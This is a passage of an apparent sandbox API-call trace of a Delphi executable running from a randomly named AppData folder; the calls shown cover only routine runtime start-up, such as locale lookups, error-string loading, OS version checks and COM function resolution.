phkResult=0x12d764*=0x0) returned 0x2 [0093.937] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0093.938] GetUserDefaultUILanguage () returned 0x409 [0093.938] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0093.938] GetThreadUILanguage () returned 0x120409 [0093.939] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0093.939] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x135a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x135a680, pcchLanguagesBuffer=0x12d768) returned 1 [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.939] GetUserDefaultUILanguage () returned 0x409 [0093.939] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0093.939] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.940] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0093.940] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0093.941] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.941] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.941] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1c4300 [0093.941] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0093.941] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0093.941] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0093.941] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0093.941] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.941] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13280dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0093.941] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0093.941] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0093.942] GetThreadLocale () returned 0x409 [0093.942] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0093.942] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0093.942] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0093.942] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.942] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0093.942] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1c4310 [0093.942] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0093.942] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0093.942] GetLastError () returned 0x7a [0093.942] GetLogicalProcessorInformation (in: Buffer=0x13199d0, ReturnedLength=0x12fab0 | out: Buffer=0x13199d0, ReturnedLength=0x12fab0) returned 1 [0093.942] GetCurrentThreadId () returned 0xaf0 [0093.942] GetCurrentThreadId () returned 0xaf0 [0093.942] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0093.943] GetThreadLocale () returned 0x409 [0093.943] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0093.943] GetThreadLocale () returned 0x409 [0093.943] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0093.943] GetCurrentThreadId () returned 0xaf0 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0093.943] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0093.944] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0093.944] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0093.944] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0093.945] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0093.946] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0093.946] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0093.946] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15073568958) returned 1 [0093.946] GetTickCount () returned 0x22c7c [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15073583188) returned 1 [0093.947] GetTickCount () returned 0x22c7c [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x8, wMilliseconds=0x38e)) [0093.947] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13282bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x131288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13282bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.947] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13282bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0093.947] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 